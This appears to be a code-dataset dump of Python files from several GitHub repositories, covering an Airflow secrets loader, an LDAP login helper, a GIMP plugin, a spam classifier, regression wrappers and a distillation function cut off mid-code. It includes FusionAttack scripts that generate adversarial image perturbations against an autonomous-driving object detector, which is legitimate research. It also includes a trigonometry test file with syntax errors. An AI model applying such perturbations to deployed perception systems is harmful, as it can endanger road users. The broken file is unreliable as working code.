metadata
dict | text
stringlengths 60
3.49M
|
---|---|
{
"source": "jjmurre/airflow",
"score": 2
} |
#### File: airflow/secrets/__init__.py
```python
__all__ = ['BaseSecretsBackend', 'get_connections']
import json
from abc import ABC, abstractmethod
from json import JSONDecodeError
from typing import List
from airflow.configuration import conf
from airflow.exceptions import AirflowException
from airflow.models import Connection
from airflow.utils.module_loading import import_string
CONFIG_SECTION = "secrets"
DEFAULT_SECRETS_SEARCH_PATH = [
"airflow.secrets.environment_variables.EnvironmentVariablesSecretsBackend",
"airflow.secrets.metastore.MetastoreSecretsBackend",
]
class BaseSecretsBackend(ABC):
"""
Abstract base class to retrieve secrets given a conn_id and construct a Connection object
"""
def __init__(self, **kwargs):
pass
@abstractmethod
def get_connections(self, conn_id) -> List[Connection]:
"""
Return list of connection objects matching a given ``conn_id``.
:param conn_id: connection id to search for
:return:
"""
def get_connections(conn_id: str) -> List[Connection]:
"""
Get all connections as an iterable.
:param conn_id: connection id
:return: array of connections
"""
for secrets_backend in ensure_secrets_loaded():
conn_list = secrets_backend.get_connections(conn_id=conn_id)
if conn_list:
return list(conn_list)
raise AirflowException("The conn_id `{0}` isn't defined".format(conn_id))
def initialize_secrets_backends() -> List[BaseSecretsBackend]:
"""
* import secrets backend classes
* instantiate them and return them in a list
"""
alternative_secrets_backend = conf.get(section=CONFIG_SECTION, key='backend', fallback='')
try:
alternative_secrets_config_dict = json.loads(
conf.get(section=CONFIG_SECTION, key='backend_kwargs', fallback='{}')
)
except JSONDecodeError:
alternative_secrets_config_dict = {}
backend_list = []
if alternative_secrets_backend:
secrets_backend_cls = import_string(alternative_secrets_backend)
backend_list.append(secrets_backend_cls(**alternative_secrets_config_dict))
for class_name in DEFAULT_SECRETS_SEARCH_PATH:
secrets_backend_cls = import_string(class_name)
backend_list.append(secrets_backend_cls())
return backend_list
def ensure_secrets_loaded() -> List[BaseSecretsBackend]:
"""
Ensure that all secrets backends are loaded.
If the secrets_backend_list contains only 2 default backends, reload it.
"""
# Check if the secrets_backend_list contains only 2 default backends
if len(secrets_backend_list) == 2:
return initialize_secrets_backends()
return secrets_backend_list
secrets_backend_list = initialize_secrets_backends()
``` |
{
"source": "jjmutumi/flask-active-directory",
"score": 3
} |
#### File: jjmutumi/flask-active-directory/models.py
```python
import ldap3
def authenticate(server_uri, domain, username, password):
user_dc = ["cn=" + username] + ["dc=" + dc for dc in domain.split(".")]
user_dc = ",".join(user_dc)
server = ldap3.Server(server_uri, get_info=ldap3.ALL)
connection = ldap3.Connection(server, user=user_dc, password=password)
if not connection.bind():
raise ValueError("Invalid credentials")
``` |
{
"source": "jjmutumi/gimp-variable-data",
"score": 3
} |
#### File: jjmutumi/gimp-variable-data/variable_data.py
```python
from gimpfu import *
import csv
import os
def get_text_layers(image):
return {layer.name: layer for layer in image.layers if layer.type == 1}
def get_top_most_drawable(image):
for layer in image.layers:
if layer.type == 0:
return layer
def get_paths(image):
return {vector.name: vector for vector in image.vectors}
def get_filename_for(row):
return row[0]
def get_template_variable_for(template_variables, row_index, column_index):
return template_variables[column_index]
def variable_data(image, csv_filename, pdf_directory, pdf_filename):
images = [] # saved list of generated images
template_variables = [] # saved list of generated images
# for each line in the csv
with open(csv_filename, "rb") as csv_file:
row_count = sum(1 for row in csv_file) - 1
csv_file.seek(0)
for rindex, row in enumerate(csv.reader(csv_file)):
if rindex == 0:
template_variables = row[1:]
continue
new_image = image.duplicate()
filename = get_filename_for(row)
text_layers = get_text_layers(new_image)
paths = get_paths(new_image)
drawable = get_top_most_drawable(new_image)
# fill-in the template parameters
for cindex, color in enumerate(row[1:]):
template_variable = get_template_variable_for(template_variables, rindex, cindex)
if template_variable in text_layers:
text_layer = text_layers[template_variable]
gimp.pdb.gimp_text_layer_set_color(text_layer, color)
elif template_variable in paths:
path = paths[template_variable]
path.to_selection()
gimp.pdb.gimp_image_get_selection(new_image)
gimp.pdb.gimp_context_set_background(color)
gimp.pdb.gimp_edit_bucket_fill(drawable, 1, 0, 100, 0, 0, 0, 0)
dirname = os.path.dirname(os.path.abspath(filename))
if not os.path.isdir(dirname):
os.makedirs(dirname)
gimp.pdb.file_pdf_save(new_image, new_image.merge_visible_layers(0), filename, filename, 0, 1, 1)
images.append(new_image)
# progress bar
gimp.pdb.gimp_progress_update( (rindex) / float(row_count))
gimp.pdb.gimp_progress_set_text("%s of %s" % (rindex, row_count))
# lastly save the pdf
pdf_filename = os.path.join(pdf_directory, pdf_filename)
gimp.pdb.file_pdf_save_multi([image.ID for image in images], len(images), 0, 0, 0, pdf_filename, pdf_filename)
register(
"joseph_n_m_variable_data",
"Variable data",
"Populate an image path and text layers with columns from CSV",
"<NAME>.",
"<NAME>.",
"2018",
"Variable Data (CSV)...",
"*",
[
(PF_IMAGE, "image", "", ""),
(PF_FILENAME, "csv_filename", "Input CSV (*.csv):", ""),
(PF_DIRNAME, "pdf_directory", "PDF directory:", ""),
(PF_STRING, "pdf_filename", "PDF file name:", "out.pdf"),
],
[],
variable_data, menu="<Image>/File/Create")
main()
``` |
{
"source": "jjn037/FusionAttack",
"score": 2
} |
#### File: FusionAttack/tools/save_data.py
```python
import _init_path
import numpy as np
import os
import argparse
import lib.utils.calibration as calibration
from lib.config import cfg, cfg_from_file, cfg_from_list
from PIL import Image
import scipy.io as sio
from sklearn.cross_decomposition import CCA
from sklearn.decomposition import PCA
import joblib
parser = argparse.ArgumentParser(description = "arg parser")
parser.add_argument('--cfg_file', type = str, default = 'cfgs/LI_Fusion_with_attention_use_ce_loss.yaml',
help = 'specify the config for training')
parser.add_argument('--out_dir', type = str, default = None)
parser.add_argument('--set', dest = 'set_cfgs', default = None, nargs = argparse.REMAINDER,
help = 'set extra config keys if needed')
parser.add_argument('--cca_suffix', type = str, default = None)
parser.add_argument('--cca_n', type=int, default=512)
parser.add_argument('--cca_mi', type=int, default=1000)
parser.add_argument('--ridge', action = 'store_true', default = False)
parser.add_argument('--lamda', type=float, default=0.1)
parser.add_argument('--ridge_suffix', type = str, default = None)
args = parser.parse_args()
class save_kitti(object):
def __init__(self, out_dir, save_choice=False, save_np=False, save_mat=False, n_samples=0, load=False):
root_dir = os.path.join('../', 'data')
self.imageset_dir = os.path.join(root_dir, 'KITTI', 'object', 'training')
split_dir = os.path.join(root_dir, 'KITTI', 'ImageSets', 'train.txt')
self.image_idx_list = [x.strip() for x in open(split_dir).readlines()]
self.sample_id_list = [int(sample_id) for sample_id in self.image_idx_list]
self.image_dir = os.path.join(self.imageset_dir, 'image_2')
self.lidar_dir = os.path.join(self.imageset_dir, 'velodyne')
self.calib_dir = os.path.join(self.imageset_dir, 'calib')
self.out_dir = out_dir
self.choice_dir = os.path.join(self.out_dir, 'choice')
os.makedirs(self.choice_dir, exist_ok=True)
self.save_choice = save_choice
self.save_np = save_np
self.save_mat = save_mat
self.n_samples = n_samples
self.load = load
self.mean = [0.485, 0.456, 0.406]
self.std = [0.229, 0.224, 0.225]
self.npoints = 16384
def get_calib(self, idx):
calib_file = os.path.join(self.calib_dir, '%06d.txt' % idx)
assert os.path.exists(calib_file)
return calibration.Calibration(calib_file)
def get_image_rgb(self, idx, vis=False):
"""
return img with normalization in rgb mode
:param idx:
:return: imback(H,W,3)
"""
img_file = os.path.join(self.image_dir, '%06d.png' % idx)
assert os.path.exists(img_file)
im = Image.open(img_file).convert('RGB')
im = np.array(im).astype(np.float)
im = im / 255.0
im -= self.mean
im /= self.std
# print(im.shape)
# ~[-2,2]
# im = im[:, :, ::-1]
# make same size padding with 0
imback = np.zeros([384, 1280, 3], dtype = np.float)
imback[:im.shape[0], :im.shape[1], :] = im
if vis:
return imback, im.shape[0], im.shape[1]
else:
return imback # (H,W,3) RGB mode
def get_image_shape(self, idx):
img_file = os.path.join(self.image_dir, '%06d.png' % idx)
assert os.path.exists(img_file)
im = Image.open(img_file)
width, height = im.size
return height, width, 3
def get_lidar(self, idx):
lidar_file = os.path.join(self.lidar_dir, '%06d.bin' % idx)
assert os.path.exists(lidar_file)
return np.fromfile(lidar_file, dtype = np.float32).reshape(-1, 4)
@staticmethod
def get_valid_flag(pts_rect, pts_img, pts_rect_depth, img_shape):
"""
Valid point should be in the image (and in the PC_AREA_SCOPE)
:param pts_rect:
:param pts_img:
:param pts_rect_depth:
:param img_shape:
:return:
"""
val_flag_1 = np.logical_and(pts_img[:, 0] >= 0, pts_img[:, 0] < img_shape[1])
val_flag_2 = np.logical_and(pts_img[:, 1] >= 0, pts_img[:, 1] < img_shape[0])
val_flag_merge = np.logical_and(val_flag_1, val_flag_2)
pts_valid_flag = np.logical_and(val_flag_merge, pts_rect_depth >= 0)
if cfg.PC_REDUCE_BY_RANGE:
x_range, y_range, z_range = cfg.PC_AREA_SCOPE
pts_x, pts_y, pts_z = pts_rect[:, 0], pts_rect[:, 1], pts_rect[:, 2]
range_flag = (pts_x >= x_range[0]) & (pts_x <= x_range[1]) \
& (pts_y >= y_range[0]) & (pts_y <= y_range[1]) \
& (pts_z >= z_range[0]) & (pts_z <= z_range[1])
pts_valid_flag = pts_valid_flag & range_flag
return pts_valid_flag
def save_all(self):
if self.load:
print('loading...')
img_file = os.path.join(self.out_dir, 'img_all.npy')
pts_file = os.path.join(self.out_dir, 'pts_all.npy')
img_all_np = np.load(img_file)
pts_all_np = np.load(pts_file)
print('loaded')
else:
img_all = []
pts_all = []
i = 0
for sample_id in self.sample_id_list:
if i >= self.n_samples > 0:
break
if i % 100 == 0:
print('processing: %d' % i)
calib = self.get_calib(sample_id)
img = self.get_image_rgb(sample_id)
img_shape = self.get_image_shape(sample_id)
pts_lidar = self.get_lidar(sample_id)
# get valid point (projected points should be in image)
pts_rect = calib.lidar_to_rect(pts_lidar[:, 0:3])
# pts_intensity = pts_lidar[:, 3]
pts_img, pts_rect_depth = calib.rect_to_img(pts_rect)
pts_valid_flag = self.get_valid_flag(pts_rect, pts_img, pts_rect_depth, img_shape)
pts_rect = pts_rect[pts_valid_flag][:, 0:3]
# pts_intensity = pts_intensity[pts_valid_flag]
# pts_origin_xy = pts_img[pts_valid_flag]
if self.save_choice:
if self.npoints < len(pts_rect):
pts_depth = pts_rect[:, 2]
pts_near_flag = pts_depth < 40.0
far_idxs_choice = np.where(pts_near_flag == 0)[0]
near_idxs = np.where(pts_near_flag == 1)[0]
near_idxs_choice = np.random.choice(near_idxs, self.npoints - len(far_idxs_choice),
replace=False)
choice = np.concatenate((near_idxs_choice, far_idxs_choice), axis=0) \
if len(far_idxs_choice) > 0 else near_idxs_choice
np.random.shuffle(choice)
else:
choice = np.arange(0, len(pts_rect), dtype=np.int32)
if self.npoints > len(pts_rect):
extra_choice = np.random.choice(choice, self.npoints - len(pts_rect), replace=False)
choice = np.concatenate((choice, extra_choice), axis=0)
np.random.shuffle(choice)
choice_file = os.path.join(self.choice_dir, '%06d.npy' % sample_id)
np.save(choice_file, choice)
else:
choice_file = os.path.join(self.choice_dir, '%06d.npy' % sample_id)
choice = np.load(choice_file)
ret_pts_rect = pts_rect[choice, :]
img_all.append(img.reshape(1, -1))
pts_all.append(ret_pts_rect.reshape(1, -1))
i += 1
print('saving...')
img_all_np = np.concatenate(img_all)
pts_all_np = np.concatenate(pts_all)
if self.save_np:
img_file = os.path.join(self.out_dir, 'img_%d.npy' % self.n_samples)
np.save(img_file, img_all_np)
pts_file = os.path.join(self.out_dir, 'pts_%d.npy' % self.n_samples)
np.save(pts_file, pts_all_np)
if self.save_mat:
img_mat = os.path.join(self.out_dir, 'img_%d.mat' % self.n_samples)
sio.savemat(img_mat, {'img_all': img_all_np})
pts_mat = os.path.join(self.out_dir, 'pts_%d.mat' % self.n_samples)
sio.savemat(pts_mat, {'pts_all': pts_all_np})
print('saved')
if args.ridge:
print('loading pca1...')
pca1_file = os.path.join(self.out_dir, 'pca_img_0_%s.m' % args.cca_suffix)
pca1 = joblib.load(pca1_file)
print('ridge regression...')
img_pca = pca1.transform(img_all_np)
e = np.identity(3000)
r1 = np.dot(img_pca.T, img_pca) + args.lamda * e
p = np.dot(np.dot(np.linalg.inv(r1), img_pca.T), pts_all_np)
ridge_file = os.path.join(self.out_dir, 'ridge_%s.npy' % args.ridge_suffix)
np.save(ridge_file, p)
else:
if self.load:
print('loading pca1...')
pca1_file = os.path.join(self.out_dir, 'pca_img_0_n128mi1500.m')
pca1 = joblib.load(pca1_file)
img_all_np_pca = pca1.transform(img_all_np)
print('loading pca2...')
pca2_file = os.path.join(self.out_dir, 'pca_pts_0_n128mi1500.m')
pca2 = joblib.load(pca2_file)
pts_all_np_pca = pca2.transform(pts_all_np)
else:
print('PCA1...')
pca1 = PCA(n_components=3000)
img_all_np_pca = pca1.fit_transform(img_all_np)
pca_file = os.path.join(self.out_dir, 'pca_img_%d_%s.m' % (self.n_samples, args.cca_suffix))
joblib.dump(pca1, pca_file)
print('PCA2...')
pca2 = PCA(n_components=3000)
pts_all_np_pca = pca2.fit_transform(pts_all_np)
pca_file = os.path.join(self.out_dir, 'pca_pts_%d_%s.m' % (self.n_samples, args.cca_suffix))
joblib.dump(pca2, pca_file)
print('CCA...')
cca = CCA(n_components=args.cca_n, max_iter=args.cca_mi)
cca.fit(img_all_np_pca, pts_all_np_pca)
cca_file = os.path.join(self.out_dir, 'cca2_%d_%s.m' % (self.n_samples, args.cca_suffix))
joblib.dump(cca, cca_file)
# cca = rcca.CCA(kernelcca=False, reg=0., numCC=2)
# cca.train([img_all_np, pts_all_np])
# cca_file = os.path.join(self.out_dir, 'rcca_%d.h5' % self.n_samples)
# cca.save(cca_file)
print('done')
if __name__ == '__main__':
if args.cfg_file is not None:
cfg_from_file(args.cfg_file)
if args.set_cfgs is not None:
cfg_from_list(args.set_cfgs)
assert args.out_dir is not None
os.makedirs(args.out_dir, exist_ok=True)
dataset = save_kitti(args.out_dir, save_choice=False, save_np=False, save_mat=False, n_samples=0, load=True)
dataset.save_all()
```
#### File: FusionAttack/tools/vis_img_adv.py
```python
import _init_path
import os
import numpy as np
import pickle
import torch
from torch.nn.functional import grid_sample
import lib.utils.roipool3d.roipool3d_utils as roipool3d_utils
from lib.datasets.kitti_dataset import KittiDataset
import argparse
from lib.datasets.kitti_rcnn_dataset import interpolate_img_by_xy
parser = argparse.ArgumentParser()
parser.add_argument('--save_dir', type = str, default = './log/data_adv')
parser.add_argument('--class_name', type = str, default = 'Car')
parser.add_argument('--split', type = str, default = 'val')
parser.add_argument("--adv_ckpt_dir", type = str, default = None)
parser.add_argument("--adv_iter", type = int, default = 100)
parser.add_argument('--noise', action = 'store_true', default = False)
parser.add_argument('--fusion', action = 'store_true', default = False)
args = parser.parse_args()
# import cv2
from lib.config import cfg
from lib.net.GAN_model import Generator_img, Generator_fusimg
from lib.net.train_functions import reduce_sum
from PIL import Image
class GTDatabaseGenerator(KittiDataset):
def __init__(self, root_dir, split = 'val', classes = args.class_name):
super().__init__(root_dir, split = split)
self.gt_database = None
if classes == 'Car':
self.classes = ('Background', 'Car')
elif classes == 'People':
self.classes = ('Background', 'Pedestrian', 'Cyclist')
elif classes == 'Pedestrian':
self.classes = ('Background', 'Pedestrian')
elif classes == 'Cyclist':
self.classes = ('Background', 'Cyclist')
else:
assert False, "Invalid classes: %s" % classes
# self.velodyne_rgb_dir = os.path.join(root_dir, 'KITTI/object/training/velodyne_rgb')
# # if not os.path.exists(self.velodyne_rgb_dir):
# os.makedirs(self.velodyne_rgb_dir, exist_ok = True)
if args.fusion:
self.generator = Generator_fusimg(num_channels=3, ngf=100)
else:
self.generator = Generator_img(num_channels=3, ngf=100)
self.generator.cuda()
print("==> Loading generator")
aimg_ckpt = os.path.join(args.adv_ckpt_dir, 'checkpoint_Gimg_iter_%d.pth' % args.adv_iter)
checkpoint = torch.load(aimg_ckpt)
self.generator.load_state_dict(checkpoint['model_state'])
self.generator.eval()
img_mean = np.array([0.485, 0.456, 0.406])
img_std = np.array([0.229, 0.224, 0.225])
self.clamp_max = (1. - img_mean) / img_std
self.clamp_min = - img_mean / img_std
def __len__(self):
raise NotImplementedError
def __getitem__(self, item):
raise NotImplementedError
def filtrate_objects(self, obj_list):
valid_obj_list = []
for obj in obj_list:
if obj.cls_type not in self.classes:
continue
if obj.level_str not in ['Easy', 'Moderate', 'Hard']:
continue
valid_obj_list.append(obj)
return valid_obj_list
@staticmethod
def get_valid_flag(pts_rect, pts_img, pts_rect_depth, img_shape):
"""
Valid point should be in the image (and in the PC_AREA_SCOPE)
:param pts_rect:
:param pts_img:
:param pts_rect_depth:
:param img_shape:
:return:
"""
val_flag_1 = np.logical_and(pts_img[:, 0] >= 0, pts_img[:, 0] < img_shape[1])
val_flag_2 = np.logical_and(pts_img[:, 1] >= 0, pts_img[:, 1] < img_shape[0])
val_flag_merge = np.logical_and(val_flag_1, val_flag_2)
pts_valid_flag = np.logical_and(val_flag_merge, pts_rect_depth >= 0)
if cfg.PC_REDUCE_BY_RANGE:
x_range, y_range, z_range = cfg.PC_AREA_SCOPE
pts_x, pts_y, pts_z = pts_rect[:, 0], pts_rect[:, 1], pts_rect[:, 2]
range_flag = (pts_x >= x_range[0]) & (pts_x <= x_range[1]) \
& (pts_y >= y_range[0]) & (pts_y <= y_range[1]) \
& (pts_z >= z_range[0]) & (pts_z <= z_range[1])
pts_valid_flag = pts_valid_flag & range_flag
return pts_valid_flag
def vis_img(self, sample_id):
gt_database = []
sample_id = int(sample_id)
print('process gt sample (id=%06d)' % sample_id)
# (H,W,3)
img, h, w = self.get_image_rgb_with_normal(sample_id, vis=True)
if args.noise:
img = img + args.pert
img = torch.from_numpy(img).unsqueeze(0).cuda(non_blocking=True).float().permute((0, 3, 1, 2))
img_r = torch.zeros_like(img).cuda()
for j in range(3):
img_r[:, j, :, :] = torch.clamp(img[:, j, :, :], min=self.clamp_min[j], max=self.clamp_max[j])
pert_dist = np.sum(args.pert ** 2)
pert_dist_r = torch.mean(reduce_sum((img_r - img) ** 2))
img_gen = img_r.permute((0, 2, 3, 1)).squeeze(0).cpu().numpy()
else:
img_ori = torch.from_numpy(img).unsqueeze(0).cuda(non_blocking=True).float().permute((0, 3, 1, 2))
if args.fusion:
img_pert, _ = self.generator(img_ori)
else:
img_pert = self.generator(img_ori)
pert_dist = torch.mean(reduce_sum(img_pert ** 2))
adv_img = img_ori + img_pert
adv_img_r = torch.zeros_like(img_ori).cuda()
for j in range(3):
adv_img_r[:, j, :, :] = torch.clamp(adv_img[:, j, :, :], min=self.clamp_min[j], max=self.clamp_max[j])
pert_dist_r = torch.mean(reduce_sum((adv_img_r - img_ori) ** 2))
img_gen = adv_img_r.permute((0, 2, 3, 1)).squeeze(0).cpu().numpy()
img_gen = ((img_gen * self.std + self.mean) * 255)
img_gen = img_gen.astype(np.uint8)
img_gen = img_gen[:h, :w, :]
img_save = Image.fromarray(img_gen)
img_file = os.path.join(args.save_dir, '%06d_adv.png' % sample_id)
img_save.save(img_file)
print('pert img dist: %f' % pert_dist)
print('pert img dist refined: %f' % pert_dist_r)
input('Pause: ')
if __name__ == '__main__':
dataset = GTDatabaseGenerator(root_dir = '../data/', split = args.split)
os.makedirs(args.save_dir, exist_ok = True)
if args.noise:
args.pert = np.random.normal(0.0, 0.2, size=(384, 1280, 3))
pert_file = os.path.join(args.save_dir, 'pert.npy')
np.save(pert_file, args.pert)
with torch.no_grad():
while True:
idx = input('sample id:')
if idx == '':
break
dataset.vis_img(idx)
# gt_database = pickle.load(open('gt_database/train_gt_database.pkl', 'rb'))
# print(gt_database.__len__())
# import pdb
# pdb.set_trace()
``` |
{
"source": "jjnp/dss20-ue1",
"score": 3
} |
#### File: jjnp/dss20-ue1/main.py
```python
from numpy.random import seed
# Set seed value used by Keras for reproducible results
seed(42)
import pandas as pd
import numpy as np
import sys
from keras.preprocessing.text import Tokenizer
from keras import models
from keras import layers
from sklearn.model_selection import train_test_split
from matplotlib import pyplot as plt
from numpy import zeros
def token_to_vector(sequences, size=10000):
results = zeros((len(sequences), size))
for i, sequence in enumerate(sequences):
results[i, sequence] = 1
return results
def class_label_to_vector(class_labels):
results = zeros(len(class_labels))
for i, label in enumerate(class_labels):
if (label.lower() == 'spam'):
results[i] = 1
return results
rawdata = pd.read_csv('input_data.csv', encoding='cp1250')
rawdata = rawdata.dropna(axis='columns')
X = rawdata['v2']
y = rawdata['v1']
X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.2, random_state=40)
print('Tokenizing text')
tokenizer = Tokenizer()
tokenizer.fit_on_texts(X_train)
X_train_tokenized = tokenizer.texts_to_sequences(X_train)
X_test_tokenized = tokenizer.texts_to_sequences(X_test)
print('Vectorizing tokenized text')
x_train = token_to_vector(X_train_tokenized, 10000)
x_test = token_to_vector(X_test_tokenized, 10000)
y_train = class_label_to_vector(y_train)
y_test = class_label_to_vector(y_test)
if len(sys.argv) > 1:
print('Writing preprocessed data to disk...')
print('This may take a while depending on the speed of your disk and computer so stay patient!')
train_x_df = pd.DataFrame(x_train)
train_x_df.to_csv('results/training_input.csv')
test_x_df = pd.DataFrame(x_test)
test_x_df.to_csv('results/test_input.csv')
train_y_df = pd.DataFrame(y_train)
train_y_df.to_csv('results/training_labels.csv')
test_y_df = pd.DataFrame(y_test)
test_y_df.to_csv('results/test_labels.csv')
print('Finished writing preprocessed data to disk')
print('Starting model fitting...')
model = models.Sequential()
model.add(layers.Dense(4, activation='relu', input_shape=(10000,)))
model.add(layers.Dense(4, activation='relu'))
model.add(layers.Dense(1, activation='sigmoid'))
model.compile(optimizer='rmsprop', loss='binary_crossentropy', metrics=['accuracy'])
history = model.fit(x_train,y_train,epochs=20,batch_size=100,validation_split=0.5)
# visualisation
epochs=range(1, 21)
history_dict = history.history
plt.plot(history.history['accuracy'])
plt.plot(history.history['val_accuracy'])
plt.title('Model Accuracy')
plt.ylabel('Accuracy Score')
plt.xlabel('Epochs')
plt.legend(['training', 'validation'], loc='lower right')
plt.savefig('results/accuracy_epoch.png')
plt.close()
plt.plot(history.history['loss'])
plt.plot(history.history['val_loss'])
plt.title('Model Loss function')
plt.ylabel('Loss')
plt.xlabel('Epochs')
plt.legend(['training', 'validation'], loc='upper right')
plt.savefig('results/loss_epoch.png')
results = model.evaluate(x_test, y_test)
outputfile = open('results/results.txt', 'w+')
outputfile.write('Final results after training for 20 Epochs\n')
outputfile.write('Accuracy: %s\n' % (results[1]))
outputfile.write('Loss: %s\n' % (results[0]))
outputfile.flush()
outputfile.close()
print('DONE')
``` |
{
"source": "jjoaosilva/TransformadaDiscretaDeFourrier",
"score": 4
} |
#### File: Linearizacao/testeDektop/teste.py
```python
from math import pi
from math import sin
def senoL(num):
if num >= 0 and num <= 0.5:
return 0.958800*num + 0.000000
elif num > 0.5 and num <= 1:
return 0.724200*num + 0.117300
elif num > 1 and num <= 1.5:
return 0.312000*num + 0.529500
elif num > 1.5 and num <= 2:
return -0.176400*num + 1.262100
elif num > 2 and num <= 2.5:
return -0.621600*num + 2.152500
elif num > 2.5 and num <= 4:
return -0.903533*num + 2.857333
elif num > 4 and num <= 4.5:
return -0.441400*num + 1.008800
elif num > 4.5 and num <= 5:
return 0.037200*num - 1.144900
elif num > 5 and num <= 5.5:
return 0.506800*num - 3.492900
elif num > 5.5 and num <= 6:
return 0.852200*num - 5.392600
else:
return 100000
def cossenoL(num):
if num >= 0 and num <= 0.5:
return -0.244800*num + 1.000000
elif num > 0.5 and num <= 1:
return -0.674600*num + 1.214900
elif num > 1 and num <= 2.5:
return -0.894267X + 1.434567
elif num > 2.5 and num <= 3:
return -0.377800X + 0.143400
elif num > 3 and num <= 3.5:
return 0.107000X - 1.311000
elif num > 3.5 and num <= 4:
return 0.565800X - 2.916800
elif num > 4 and num <= 5.5:
return 0.908200X - 4.286400
elif num > 5.5 and num <= 6:
return 10.493200X - 61.999000
else:
return 100000
while(1):
num = float(input("Insira o valor: "))
print("Seno: %f e SenoL: %f"%(sin(num), senoL(num)))
``` |
{
"source": "jjoaovitor7/lfa_trabalhopratico2_20212",
"score": 4
} |
#### File: lfa_trabalhopratico2_20212/src/Grammar.py
```python
class Grammar (object):
grammar = dict()
def __init__(self, file):
"""
A instanciação cria um objeto vazio, aqui dá para criar com algum valor predeterminado.
Parâmetros
----------
file : File Object.
"""
self._file = file
def load(self):
"""Carregar a gramática."""
for line in self._file:
# PEGANDO A CHAVE
key = line.split("=>")
key__format = key[0].replace(" ", "")
keys__value = []
for symbol in key[1]:
if (symbol != " " and symbol != "\n"):
keys__value.append(symbol)
arr_to_string__aux = ""
for symbol in keys__value:
arr_to_string__aux += symbol
# PEGANDO OS VALORES DA CHAVE
values = arr_to_string__aux.split("|")
for i in range(0, len(values)):
try:
self.grammar[key__format] = self.grammar[key__format] + [values[i]]
except:
self.grammar[key__format] = [values[i]]
def get(self):
"""Retornar a gramática."""
return self.grammar
def print(self):
"""Visualizar a gramática."""
print(self.grammar)
``` |
{
"source": "jjobel/CluStR",
"score": 3
} |
#### File: jjobel/CluStR/reglib.py
```python
import rpy2.robjects as robjects
from rpy2.robjects.packages import importr
import numpy as np
import linmix
# Imports the necessary R packages needed to run lrgs in python
RLRGS = importr('lrgs') # Multivariate regression package by <NAME>
# Set some aliases for useful R functions
RARRAY = robjects.r('array')
RMATRIX = robjects.r('matrix')
RNORM = robjects.r('rnorm')
RC = robjects.r('c')
RLM = robjects.r('lm')
# pylint: disable=invalid-name
def run_lrgs(x, y, err_x, err_y, _xycov=None, nmc=500, dirichlet=True):
'''
Runs the lrgs regression algorithm written in R by interfacing through
rpy2. For our purposes, inputs should be in scaled (log) form. (For the
moment, only works for on-diagonal elements of the covariance matrix.) nmc
is the length of the markov chain.
'''
# pylint: disable = too-many-arguments
# pylint: disable = too-many-locals
# Make sure dimensions are correct
assert np.size(x) == np.size(y)
assert np.size(err_x) == np.size(err_y)
assert np.size(x) == np.size(err_x)
# Convert x and y to r vectors
rx = robjects.FloatVector(x)
ry = robjects.FloatVector(y)
rx_err = robjects.FloatVector(err_x)
ry_err = robjects.FloatVector(err_y)
# Set up covariance matrix
M = RARRAY(0.0, dim=RC(2, 2, np.size(rx)))
for i in range(np.size(rx)):
M.rx[1, 1, i+1] = rx_err[i]
M.rx[2, 2, i+1] = ry_err[i]
# Set some R equivalents
TRUE = robjects.BoolVector([True])
FALSE = robjects.BoolVector([False])
if dirichlet:
d = TRUE
else:
d = FALSE
# Run MCMC
posterior = RLRGS.Gibbs_regression(rx, ry, M, nmc, dirichlet=d,
trace='bsg', mention_every=50)
# Extract relevant data from posterior
B = np.array(posterior[0]) # Parameter chain
S = np.array(posterior[1])[0][0]
# ^ Scatter chain (only intrinsic scatter for the moment!)
# Prepare lrgs fit chains
intercept = B[0][0]
slope = B[1][0]
sigma = np.sqrt(S)
# Return fit parameters consistently with run_linmix
return (intercept, slope, sigma)
def run_linmix(x, y, err_x, err_y, Nmin=5000, Nmax=10000, vb=True):
# pylint: disable = too-many-arguments
''' Runs the Kelly regression algorithm through the package linmix.'''
''' For convenience, here are the linmix arguments:
Linmix Args:
x(array_like): The observed independent variable.
y(array_like): The observed dependent variable.
xsig(array_like): 1-sigma measurement errors in x.
ysig(array_like): 1-sigma measurement errors in y.
xycov(array_like): Covariance between the measurement errors in x
and y.
delta(array_like): Array indicating whether a data point is
censored (i.e., not detected), or not.
If delta[i] == 1, then the ith source is
detected. If delta[i] == 0, then the ith source
is not detected and y[i] will be interpreted as
an upper limit. Note that if there are censored
data points, then the maximum-likelihood
estimate (alpha, beta, sigsqr) is not valid. By
default, all data points are assumed to be
detected.
K(int): The number of Gaussians to use in the mixture model
for the distribution of xi.
nchains(int): The number of Monte Carlo Markov Chains to
instantiate.
'''
# Make sure dimensions are correct
assert np.size(x) == np.size(y)
assert np.size(err_x) == np.size(err_y)
assert np.size(x) == np.size(err_x)
L = np.size(x)
# FIX: Implement censored data!
# Run linmix MCMC
delta = np.ones(L)
xycov = np.zeros(L)
model = linmix.LinMix(x, y, err_x, err_y, xycov, delta, 2, 2)
model.run_mcmc(Nmin, Nmax, silent=vb)
# return intercept, slope, intrinsic scatter
intercept = model.chain['alpha']
slope = model.chain['beta']
sigma = np.sqrt(model.chain['sigsqr'])
# Return fit parameters consistently with run_lrgs
return (intercept, slope, sigma)
def check_convergence(_intercept, _slope, _sigma):
'''
FIX: In future, should implement a function that checks the convergence of
the MCMC using autocorrelation, etc. and display plots/statistics.
'''
pass
``` |
{
"source": "jjog22/interpret-community",
"score": 2
} |
#### File: interpret_community/mimic/model_distill.py
```python
import numpy as np
from scipy.sparse import issparse, isspmatrix_csr, vstack as sparse_vstack
def _soft_logit(values, clip_val=5):
"""Compute a soft logit on an iterable by bounding outputs to a min/max value.
:param values: Iterable of numeric values to logit and clip.
:type values: iter
:param clip_val: Clipping threshold for logit output.
:type clip_val: Union[Int, Float]
"""
new_values = np.log(values / (1 - values))
return np.clip(new_values, -clip_val, clip_val)
def _model_distill(teacher_model_predict_fn, uninitialized_surrogate_model, data, original_training_data,
explainable_model_args):
"""Teach a surrogate model to mimic a teacher model.
:param teacher_model_predict_fn: Blackbox model's prediction function.
:type teacher_model_predict_fn: function
:param uninitialized_surrogate_model: Uninitialized model used to distill blackbox.
:type uninitialized_surrogate_model: uninitialized model
:param data: Representative data (or training data) to train distilled model.
:type data: numpy.ndarray
:param original_training_data: Representative data (or training data) to get predictions from teacher model.
:type original_training_data: numpy.ndarray
:param explainable_model_args: An optional map of arguments to pass to the explainable model
for initialization.
:type explainable_model_args: dict
"""
# For regression, teacher_y is a real value whereas for classification it is a probability between 0 and 1
teacher_y = teacher_model_predict_fn(original_training_data)
multiclass = False
training_labels = None
is_classifier = len(teacher_y.shape) == 2
# If the predict_proba function returned one column but this is a classifier, modify to [1-p, p]
if is_classifier and teacher_y.shape[1] == 1:
